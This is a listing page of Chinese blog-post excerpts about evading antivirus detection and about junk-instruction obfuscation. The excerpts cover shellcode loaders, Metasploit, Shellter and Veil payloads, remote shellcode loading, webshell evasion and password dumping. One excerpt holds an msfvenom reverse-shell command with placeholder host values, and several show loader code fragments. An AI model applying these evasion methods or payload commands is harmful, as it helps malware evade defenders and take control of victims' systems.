免杀_花指令

Poison Ivy 2.3.0 免杀的几点思路

文章作者:mika[EST]今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。
lidatou·2020-08-18 20:15

TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)

参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg参考资料免杀技术有一套:https://anhkgg.com/aanti-virus/Meterpreter
fa1lr4in·2020-08-18 20:26

利用Dropbox中转自己的C2

利用Dropbox中转自己的C20x00前言本来的目的呢,是利用dropbox中转自己的c2达到免杀的效果,然后可能是看了文章太久没抓住机会复现,到最后发现已经失效了,会被360拦截,所以好像也没有了太大的意义
dda6607·2020-08-18 20:31

一些过时的免杀技巧 仅供参考

QVM07免杀方法HEUR/Malware.QVM06.Gen一般情况下加数字签名可过HEUR/Malware.QVM07.Gen一般情况下换资源HEUR/Malware.QVM13.Gen加壳了HEUR
r4bbit·2020-08-18 20:41

使用Shellter生成远控木马并进行持久化控制

介绍Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/步骤Shellter
郑好_zh·2020-08-18 20:09

今晚聊聊快速学习网络安全!

大部分人在学习安全方面都会半路转行,因为不知如何去学.我用了两年时间感觉自己“入行“了网络安全,从外挂、免杀、破解、逆向等等入手,五花八门,虽然开拓了我的视野,但很多技能都在之后的工作中没有应用,也就慢慢遗忘了
「已注销」·2020-08-18 20:41

编写漂亮的简历和面试技巧!

大部分人在学习安全方面都会半路转行,因为不知如何去学.我用了两年时间感觉自己“入行“了网络安全,从外挂、免杀、破解、逆向等等入手,五花八门,虽然开拓了
「已注销」·2020-08-18 20:41

js敲诈者变种利用PowerShell免杀分析

近期360安全中心监测到出现了一种js敲诈者病毒变种,此种敲诈者利用PowerShell进行免杀,通过vt对比各大安全厂商的扫描结果,发现目前杀毒厂商对此种js敲诈者病毒的检出率特别低,本文就由360QEX
SAKAISON·2020-08-18 19:37

免杀篇】远控免杀专题(66)-工具篇总结

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02免杀效果概览0x03工具免杀3.1Veil免杀(VT免杀率23/71)3.1.1使用veil直接生成exe(VT查杀率44/70
Agan '·2020-08-18 19:10

免杀篇】远控免杀专题(26)-C、C++加载shellcode免杀(上)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载shellcode免杀介绍0x02C/C++源码编译方法1:指针执行(VT免杀率23/71)方法2:申请动态内存加载(VT免杀
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02生成hta(VT查杀率14/59)0x03生成install_util(VT查杀率12/71)0x04小结免杀能力一览表几点说明
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Unicorn介绍0x02安装Unicorn0x03Unicorn使用说明0x04利用Unicorn生成后门0x05小结免杀能力一览表0x01Unicorn
Agan '·2020-08-18 19:09

后渗透篇:Metasploit shellter免杀

当你的才华还撑不起你的野心时那你就应该静下心来学习目录Metasploitshellter免杀0x01Shellter介绍0x02案例演示0x03Metasploit&Shellter捆绑免杀Metasploitshellter
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题(27)-C、C++加载shellcode免杀(中)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C/C++加载shellcode免杀介绍方法6:XOR加密(VT免杀率15/71)方法7:base64加密法1(VT免杀率28/69)方法8
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题(21)-HERCULES免杀(VT免杀率14/56)

0x01HERCULES介绍0x02安装HERCULES安装前的准备安装HERCULES安装可能遇到的问题0x03HERCULES使用说明0x04利用HERCULES生成后门0x05HERCULES小结免杀能力一览表
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02安装Shellter0x03生成payload(VT免杀率7/69)0x04小结免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒
Agan '·2020-08-18 19:09

免杀篇】远控免杀专题文章(1)-基础篇

当你的才华还撑不起你的野心时那你就应该静下心来学习目录远控免杀专题文章(1)-基础篇免杀概念杀毒软件检测方式扫描技术监控技术扫描引擎特征码扫描文件校验和法进程行为监测法(沙盒模式)主动防御技术机器学习识别技术免杀技术发展史免杀技术介绍
Agan '·2020-08-18 19:38

Pyinstaller生成exe文件免杀

0x01解决方案之前用python打包的exe文件总会被电脑关键识别成木马文件隔离,很困扰(虽说本来也不是做什么好事==)解决方案:再生成exe文件时给生成的exe加上图标即可。使用命令:pyinstaller-ixxxx.ico-w-Fxxxx.py0x02ico文件生成代码pyinstaller需要特定的后缀为.ico的图片文件来生成图标,且对文件的大小尺寸有要求。经过查询,以下方法可以顺利生
Clannad_niu·2020-08-18 19:24

免杀的艺术:史上最全的汇编Shellcode的技巧(三)

本文讲的是免杀的艺术:史上最全的汇编Shellcode的技巧(三),我们在上一篇提到要要自定义shellcode,不过由于这是个复杂的过程,我们只能专门写一篇了,本文,我们将会给大家介绍shellcode
weixin_33759269·2020-08-18 19:31

Python 加密 shellcode 免杀

Python加密shellcode免杀环境准备:Windows732位系统;Shellcode使用kalilinuxMetasploit生成shellcodeWindows7需要安装的软件:Python2.7
PeiSylon·2020-08-18 19:33

编译PI远控SHELLCODE(VC++)加异或免杀(转载于网络)

来自暗组,但原贴有诸多语法错误,以下是修正后的编译法。一,直接编译:#include#pragmacomment(linker,"/OPT:NOWIN98")#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")#pragmacomment(linker,"/MERGE:.rdata=.text")//合并区
lidatou·2020-08-18 19:11

Powershell免杀(远程加载shellcode)笔记

原文链接远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。下面代码直接从uri读取字节数组(对的,没仔细看)#remoteshell.ps1Set-StrictMode-Version2functionget_delegate_type{Param([Parameter(Position=0,Mandatory=$True)
jackslowf·2020-08-18 19:34

shellter免杀技术实战

Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/实验环境:kalishellter_v6.9360putty.exe
replaceroot·2020-08-18 18:33

免杀篇】远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Ruby加载shellcode介绍0x02Ruby嵌入shellcode(VT查杀率0/58)免杀能力一览表0x01Ruby加载shellcode
Agan '·2020-08-18 18:26

免杀篇】远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Python加载shellcode免杀介绍0x02通过py源码编译exe方法1:python加载C代码(VT免杀率19/70)方法2:py2exe
Agan '·2020-08-18 18:26

免杀篇】远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01GO加载shellcode介绍0x02Go嵌入shellcode(VT查杀率3/71)0x03Go加载器go-shellcode加载器(VT查杀率4/69)gsl加载器(VT查杀率6/71)免杀能力一览表
Agan '·2020-08-18 18:26

关于CS上线Linux主机(CrossC2)

用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。
Adminxe·2020-08-18 18:21

免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)

二次编译也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码:源代码:htt
Shanfenglan7·2020-08-18 18:09

免杀简述1(花指令/改特征码/shellcode加载器)

杀毒软件查杀思路杀软常见扫描方式与技术1、扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。2、程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。3、修复技术:即是对恶意程序所损坏的文件进行还原4、急救盘杀毒:利用空白U盘制作急救启动盘,来检测电脑病毒。5、智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。6、全盘扫描:扫描电脑全部磁盘,耗时较长。7、勒索软件防护:保护电
Shanfenglan7·2020-08-18 18:38

程序免杀技术之——花指令

花指令(junkcode)意思是程序中有一些指令,由设计者特别构思,希望使反汇编的时候出错,让破解者无法清楚正确地反汇编程序的内容,迷失方向。
zhu2695·2020-08-18 18:53

防止IDA逆向工程的花指令

发现,要使IDA的反汇编失败的最简单花指令,就是在c/c++的函数里头使用retn指令。
51大虾·2020-08-18 18:10

抗去除花指令(一)——花指令基础

入门知识,高手勿读一、概述花指令是对抗反汇编的有效手段之一,正常代码添加了花指令之后,可以破坏静态反汇编的过程,使反汇编的结果出现错误。
yangbostar·2020-08-18 18:09

抗去除花指令(二)——有创意的花指令

一、概述“jmp/call/ret+垃圾数据”这样的花指令已经是相当“老掉牙”了,OD的插件对付它们基本是“秒杀”,所以本文想说点“有点创意”的花指令,至少能对付OD的插件。
yangbostar·2020-08-18 18:09

有关花指令的一点小研究(二)

在上篇文章里我用call花指令实现迷惑IDA与OD。
pig4210·2020-08-18 15:53

花指令必备的汇编指令总结

1.寄存器介绍:(1).数据寄存器:存放数据EAX、EBX、ECX、EDX(2).指针寄存器:主要用途就是在存储器寻址时,提供偏移地址.ESP、EBP、EDI、ESIESP(堆栈指针寄存):是以“后进先出”方式工作的一个存储区,它必须存在于堆栈段中.EBP(基址指针寄存器):ESI(源变址寄存器):EDI(目的变址寄存器):2.数据传输指令:MOV-------传送字或字节PUSH------把字
iiprogram·2020-08-18 15:45

PE伪装器[花指令添加器] ---by fi7ke

也就是大家通常所说的给程序添加花指令。原理非常简单,就是给EXE文件加一个PE头,然后写我们的“花指令”。如果你读懂过jingtao的“谈Delphi编程中流的应用”那篇文章的话。
hnxyy·2020-08-18 15:23

抗去除花指令(二)——有创意的花指令

转自http://blog.csdn.net/yangbostar/article/details/6194159一、概述“jmp/call/ret+垃圾数据”这样的花指令已经是相当“老掉牙”了,OD的插件对付它们基本是
Yuri800·2020-08-18 13:54

msfvenom木马生成+免杀+壳(实测并不能免杀)

msfvenom选项:-p,--payload有效载荷使用。指定一个有效的自定义载荷--payload-options列出有效载荷的标准选项-l,--list[type]列出一个模块类型。选项有:有效载荷,编码器,NOP,所有-n,--nopsled在一个nopsled[长度]的大小对有效载荷-f,--format输出格式(使用-一个列表的帮助格式)--help-formats列出可用的格式-e,
weixin_34342992·2020-08-18 05:09

TLS--线程局部存储

https://blog.csdn.net/u013761036/article/details/54960277这个东西并不陌生了,之前写过了一个关于这个的应用,利用静态TLS姿势实现代码段静态加密免杀或者所谓的加壳思路
Answer-3·2020-08-18 03:09

Kail Linux渗透测试教程之免杀Payload生成工具Veil

KailLinux渗透测试教程之免杀Payload生成工具Veil免杀Payload生成工具——VeilKailLinux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit
ciqihui0949·2020-08-17 21:48

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀msfvenom-pwindows/meterpreter/reverse_tcp-ax86--platformLHOST=XXXLPORT=XXX-ex86
梭哈王·2020-08-17 16:20

[第五空间]re nop题目详解

[第五空间]nop第一次写这种题,看网上其他大佬的代码处理有点晕,这里提供一种不同的思路(xky太强了)ida打开,发现f5反编译的代码太诡异,直接输入完东西后就跳地址,应该是用了花指令什么的来混淆,所以直接看汇编代码我们从最开的输入一步步分析
ytj00·2020-08-17 07:01

一句话木马免杀(截止2020年8月16日通杀D盾、安全狗,微步,webshellKiller)

首先一句话木马:D盾扫描,5级分开写:1D盾扫描,4级使用可变函数的技巧(PHP支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途)1D盾扫描,3级使用array_map()函数(为数组的每个元素应用回调函数)1D盾扫描,2级把assert处理一下1D盾扫描,1级既然显示数组字符串合并,那么
ABKing·2020-08-16 23:00

免杀花指令编写组合----非常常用,免杀必备

(该免杀花指令经典,压缩可
zhu2695·2020-08-16 17:19

免杀汇编教程(汇编花指令

相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程,帮助小菜们快速入门
zacklin·2020-08-16 17:42

《黑客免杀攻防学习笔记》——C++设计一个简单的壳1

本文中的代码均来自《黑客免杀攻防》,如要转载,需写明来源,请勿用于非法用途,作者对此文章中的代码造成的任何后果不负法律责任。
Traxer·2020-08-16 16:00

花指令

完全花指令免杀学习花指令,简称“花”,意思是像花儿一样的指令。花儿是干什么的呢?当然是吸引你去观赏的,就是让你(也包括杀软)只顾去观赏美丽“花朵”,而忘记或者忽略了“花朵”后面的“果实”。
weixin_33939843·2020-08-16 15:49

浅谈利用cs进行免杀的思路总结

思路①利用c语言+veil实现免杀#include"pch.h"//可以删除#include#include#pragmacomment(linker,"/subsystem:\"windows\"/entry
goddemondemongod·2020-08-16 14:31

后渗透攻防的信息收集 -- MottoIN

常用来获取windows密码的工具1.mimikatz2.wce3.getpass4.QuarksPwDump5.reg-sam6.pwdump77.procdump.exe+mimikatz…….B.免杀抓取密码的两种方
qq_27446553·2020-08-16 14:33

第五章 花指令免杀 读书笔记

1为了保护真正的果实,所以使用花朵是别人迷惑.花指令不是加密代码,它分两种:a夹杂运行b高级语言的花指令应用,程序在运行时会因为花指令而改变原有的流程.该书暂不涉及,据称"比较复杂且效果有限"2脚本木马花指令
dalerkd·2020-08-16 12:13
上一页 8 9 10 11 12 13 14 15 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他